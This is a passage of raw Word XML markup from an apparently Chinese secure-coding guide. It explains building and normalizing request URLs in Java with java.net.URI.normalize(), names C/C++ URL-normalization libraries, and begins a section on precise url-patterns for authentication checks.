      <w:r w:rsidRPr="00E648F5">
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRPr="00912D99"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Cs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>request.getContextPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>request.getServletPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRPr="00912D99"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Cs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>pathInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>request.getPathInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRPr="00912D99"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Cs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>pathInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRPr="00912D99"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Cs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>pathInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRPr="00912D99"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Cs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912D99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRDefault="00A10490" w:rsidP="00A10490">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
        </w:rPr>
        <w:t>normalize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0015392B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>java.net.URI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>;</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0015392B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>java.net.URISyntaxException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>;</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0015392B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0015392B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Main {</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r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0015392B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0015392B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0015392B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> main(String[] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="0015392B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>throws</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>URISyntaxException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</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r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    URI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="0015392B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>URI(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>"http://java2s.com/./");</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r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>System.out.println</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Normalized URI = " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>uri.normalize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>());</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r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRPr="00A10490" w:rsidRDefault="00A10490" w:rsidP="00A1049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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10490">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRPr="00A03B1C" w:rsidRDefault="00A10490" w:rsidP="00A10490">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF15F5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03B1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身不提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准化的函数，但一些广泛使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C/C++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发库提供，如：</w:t>
      </w:r>
      <w:r w:rsidR="002C2771">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009A6549">
        <w:instrText>HYPERLINK "http://pocoproject.org/docs/Poco.URI.html"</w:instrText>
      </w:r>
      <w:r w:rsidR="002C2771">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A03B1C">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>POCO C++ Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03B1C">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03B1C">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URI.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03B1C">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> normalize()</w:t>
      </w:r>
      <w:r w:rsidR="002C2771">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="002C2771">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009A6549">
        <w:instrText>HYPERLINK "http://code.google.com/p/google-url/"</w:instrText>
      </w:r>
      <w:r w:rsidR="002C2771">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="007E27D4">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>google-url project</w:t>
      </w:r>
      <w:r w:rsidR="002C2771">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007E27D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也提供类似功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRDefault="00A10490" w:rsidP="00A10490">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C142B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C142B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准化参考：</w:t>
      </w:r>
      <w:r w:rsidR="002C2771">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009A6549">
        <w:instrText>HYPERLINK "https://en.wikipedia.org/wiki/URL_normalization"</w:instrText>
      </w:r>
      <w:r w:rsidR="002C2771">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C142B0">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>https://en.wikipedia.org/wiki/URL_normalization</w:t>
      </w:r>
      <w:r w:rsidR="002C2771">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10490" w:rsidRPr="00A10490" w:rsidRDefault="00A10490" w:rsidP="00A10490"/>
    <w:p w:rsidR="00056A80" w:rsidRDefault="003C5572" w:rsidP="00056A80">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断是否需要</w:t>
      </w:r>
      <w:r w:rsidR="00056A80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00396232" w:rsidRPr="00396232" w:rsidRDefault="00396232" w:rsidP="00396232">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用较精确的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
